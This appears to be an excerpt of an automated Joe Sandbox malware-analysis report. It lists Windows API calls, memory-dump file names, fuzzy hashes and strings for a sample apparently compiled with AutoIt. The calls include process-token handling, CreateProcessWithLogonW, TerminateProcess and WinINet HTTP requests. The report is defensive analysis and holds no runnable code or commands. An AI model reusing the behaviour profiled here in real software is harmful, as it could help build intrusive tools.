                                                                                                                  • Part of subcall function 009380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009380E0
                                                                                                                  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009380F6
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,0093842F), ref: 009388CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009388D6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009388DD
                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 009388F6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0093842F), ref: 0093890A
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00938911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 3008561057-0
                                                                                                                • Opcode ID: b76aa23959fa5412538b281221deec07461b7648dc4e54b8a5ea922f688837c1
                                                                                                                • Instruction ID: 0632a1ac77e797a78a2925205779bb4a2e6fc863fa7a5a32302226e37a1f8feb
                                                                                                                • Opcode Fuzzy Hash: b76aa23959fa5412538b281221deec07461b7648dc4e54b8a5ea922f688837c1
                                                                                                                • Instruction Fuzzy Hash: 4E119D71525209FBDB109FA4DC19BBF77ACFB45355F10402CF88597110CB769904DB60
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009385E2
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 009385E9
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009385F8
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00938603
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00938632
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00938646
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: feaa0b811db6fe8efccf0cf2a6aa3c4f98bac94d7d280a0e15072896606c4d09
                                                                                                                • Instruction ID: 79a78e651621a7a6f812b50b4c961b5b2e1460d7b23f5e21509ef44ebc4f6701
                                                                                                                • Opcode Fuzzy Hash: feaa0b811db6fe8efccf0cf2a6aa3c4f98bac94d7d280a0e15072896606c4d09
                                                                                                                • Instruction Fuzzy Hash: 6711597251420DABDF018FA4ED49FEF7BA9EF08348F044068FE04A2160C7B28D64EB60
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0093B7B5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0093B7C6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093B7CD
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0093B7D5
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0093B7EC
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0093B7FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                • Opcode ID: a90b10a7f9cf45f1a012517f76f5200201368bfdbc1fda077c115ca18f7f3b64
                                                                                                                • Instruction ID: eb6f694a520ac61143d1eb17c63e65d645dc19f1bda16033200aa2f5fa09fa0d
                                                                                                                • Opcode Fuzzy Hash: a90b10a7f9cf45f1a012517f76f5200201368bfdbc1fda077c115ca18f7f3b64
                                                                                                                • Instruction Fuzzy Hash: 84014475E04219BBEF109BA6DD45B5EBFB8EB48751F004079FA04A7291D6709C10DF91
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00900193
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0090019B
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009001A6
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009001B1
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 009001B9
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 009001C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: d72e4e74bed28dedc6da74d8f4b896b0fc9c5f6d39872491bc8069bab2fd28dc
                                                                                                                • Instruction ID: 6a29fae1f652c9eb359f100ca35c22ebfc98381be128179a3f3ae2bef5d4d40f
                                                                                                                • Opcode Fuzzy Hash: d72e4e74bed28dedc6da74d8f4b896b0fc9c5f6d39872491bc8069bab2fd28dc
                                                                                                                • Instruction Fuzzy Hash: A10148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7F5A864CBE5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009453F9
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094540F
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0094541E
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094542D
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00945437
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094543E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: a051ffb3ccb1d5fa5761a30a2b87f2e436d8ddf6fd4000005dc3a3d45e0187dd
                                                                                                                • Instruction ID: adf6eec2d0770317328210a9a5f506e83d971fe1bbd7eba146090a4f270faff9
                                                                                                                • Opcode Fuzzy Hash: a051ffb3ccb1d5fa5761a30a2b87f2e436d8ddf6fd4000005dc3a3d45e0187dd
                                                                                                                • Instruction Fuzzy Hash: AEF06D32258558BBE3205BA2EC0DEAB7A7CEBC7B51F00016DFA04D106196E01A0196B5
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00947243
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,008F0EE4,?,?), ref: 00947254
                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,008F0EE4,?,?), ref: 00947261
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008F0EE4,?,?), ref: 0094726E
                                                                                                                  • Part of subcall function 00946C35: CloseHandle.KERNEL32(00000000,?,0094727B,?,008F0EE4,?,?), ref: 00946C3F
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00947281
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,008F0EE4,?,?), ref: 00947288
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 395418827c6e8d8e1f65cb8675b80fb3b314c956360d741b9056a9dd86533ab1
                                                                                                                • Instruction ID: b8980ead674f2b06679194f71182f0b2e23f0cbe0d2b04c547c1e6cf553ea9fd
                                                                                                                • Opcode Fuzzy Hash: 395418827c6e8d8e1f65cb8675b80fb3b314c956360d741b9056a9dd86533ab1
                                                                                                                • Instruction Fuzzy Hash: C8F0BE36058602EBD7111B64FDACEDA7729FF45302B010239F213900A0CBF61800DF50
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0093899D
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 009389A9
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009389B2
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009389BA
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009389C3
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009389CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 0feb07a67ac69ee8d6cb92d99c2cbd1cf542a136f70942418caae46d144f5dc6
                                                                                                                • Instruction ID: 0e7e3ba3f65b4f57a5c46f2415f3702b3d56d65d6a905b151baa19af0c8e814c
                                                                                                                • Opcode Fuzzy Hash: 0feb07a67ac69ee8d6cb92d99c2cbd1cf542a136f70942418caae46d144f5dc6
                                                                                                                • Instruction Fuzzy Hash: CFE0C23601C401FBDA011FE1FC1CD0ABB69FB8A3A2B118238F21981170CBB29420EB50
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00958613
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00958722
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0095889A
                                                                                                                  • Part of subcall function 00947562: VariantInit.OLEAUT32(00000000), ref: 009475A2
                                                                                                                  • Part of subcall function 00947562: VariantCopy.OLEAUT32(00000000,?), ref: 009475AB
                                                                                                                  • Part of subcall function 00947562: VariantClear.OLEAUT32(00000000), ref: 009475B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: d4b42f9060201e616b4cbeb761130a7e24fbd346035aca3d130c789e0abf5b7f
                                                                                                                • Instruction ID: f909b4ddd5b5f7955d796c0e650227db688635b782442435035425adc1e37d4d
                                                                                                                • Opcode Fuzzy Hash: d4b42f9060201e616b4cbeb761130a7e24fbd346035aca3d130c789e0abf5b7f
                                                                                                                • Instruction Fuzzy Hash: E1915A716083419FC710DF2AC48495BBBE8FF89715F14492DF99A9B361DB30E909CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • _memset.LIBCMT ref: 00942B87
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00942BB6
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00942C69
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00942C97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: a1d4538d2cb87ac4530c8b0d7b77eccaf52141d853f0c9d449e0fa678dead7a6
                                                                                                                • Instruction ID: b4452c1cf77d42ebdb325a00e7441139b6ea7a89d2a195b2076e4dae058c0bf8
                                                                                                                • Opcode Fuzzy Hash: a1d4538d2cb87ac4530c8b0d7b77eccaf52141d853f0c9d449e0fa678dead7a6
                                                                                                                • Instruction Fuzzy Hash: DC51B9716083009ED7249F28D885B6FB7E8FF8A311F540A6DF895D72D1DB64CC449BA2
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093D5D4
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0093D60A
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0093D61B
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0093D69D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: 4c81e747df828ad15017750e98c6827b7997597ff73fddd0c645232a543df4ac
                                                                                                                • Instruction ID: e2eb58466c84abcb35d3ecfb3706c7b7b88b9bd5872a66b97376b8275514220e
                                                                                                                • Opcode Fuzzy Hash: 4c81e747df828ad15017750e98c6827b7997597ff73fddd0c645232a543df4ac
                                                                                                                • Instruction Fuzzy Hash: 93418DB1601204EFDB15CF64E895A9ABBA9EF85318F1580ADFC099F205D7B1DE44CFA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 009427C0
                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009427DC
                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00942822
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009A5890,00000000), ref: 0094286B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 443b76b2842a21fd1102a1b22513a5dc96aee937ae749c9501c2890bc8412f0a
                                                                                                                • Instruction ID: 59e3213a97e113afd1093913d71637cfb34541c13cd9f2fc213eca537d15c69e
                                                                                                                • Opcode Fuzzy Hash: 443b76b2842a21fd1102a1b22513a5dc96aee937ae749c9501c2890bc8412f0a
                                                                                                                • Instruction Fuzzy Hash: FD418D702083419FD724DF24D844F2ABBE8FF85314F54496DF9A697392DB70A905CB52
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095D7C5
                                                                                                                  • Part of subcall function 008E784B: _memmove.LIBCMT ref: 008E7899
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower_memmove
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 3425801089-567219261
                                                                                                                • Opcode ID: b8681d3fc0ef46eefc62f95d36e1dc3b338c2ffd5e65eea880024e5a4325ba07
                                                                                                                • Instruction ID: baec78e35627d924e889cfe60c5fabc1852a3ebd9fb9e9faba25551fb478192a
                                                                                                                • Opcode Fuzzy Hash: b8681d3fc0ef46eefc62f95d36e1dc3b338c2ffd5e65eea880024e5a4325ba07
                                                                                                                • Instruction Fuzzy Hash: 1331D271A04619AFCF10EF99CC51AEEB7B4FF55320F008629E826976D1DB31AD09CB80
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00938F14
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00938F27
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00938F57
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 365058703-1403004172
                                                                                                                • Opcode ID: 4d98a899ad0d100a63268960546fbe424b28b7cc8e9efc005771eb204f27bf60
                                                                                                                • Instruction ID: 2ad9d858171434e323fac803b46ea703bebdb2303314713d28a13f63866c6687
                                                                                                                • Opcode Fuzzy Hash: 4d98a899ad0d100a63268960546fbe424b28b7cc8e9efc005771eb204f27bf60
                                                                                                                • Instruction Fuzzy Hash: 3C214671A04208BEDB14ABB5DC85DFFB769EF82320F044519F421971E1CF380D0ADA60
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095184C
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00951872
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009518A2
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 009518E9
                                                                                                                  • Part of subcall function 00952483: GetLastError.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 00952498
                                                                                                                  • Part of subcall function 00952483: SetEvent.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 009524AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                • Opcode ID: 8883eecb1caa4b07c194cc1e018cb0c31c5c6fc4c5f3eff1a2146af606230d14
                                                                                                                • Instruction ID: 2f3d8afa1fd7c949d2a78fb4e07e2f56c5616a0b69bc1093588e25997a0ff357
                                                                                                                • Opcode Fuzzy Hash: 8883eecb1caa4b07c194cc1e018cb0c31c5c6fc4c5f3eff1a2146af606230d14
                                                                                                                • Instruction Fuzzy Hash: 3421C2B5504308BFEB21DF62DC85FBF77EDEB89746F10412AF90596240DB648D0867A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
                                                                                                                  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
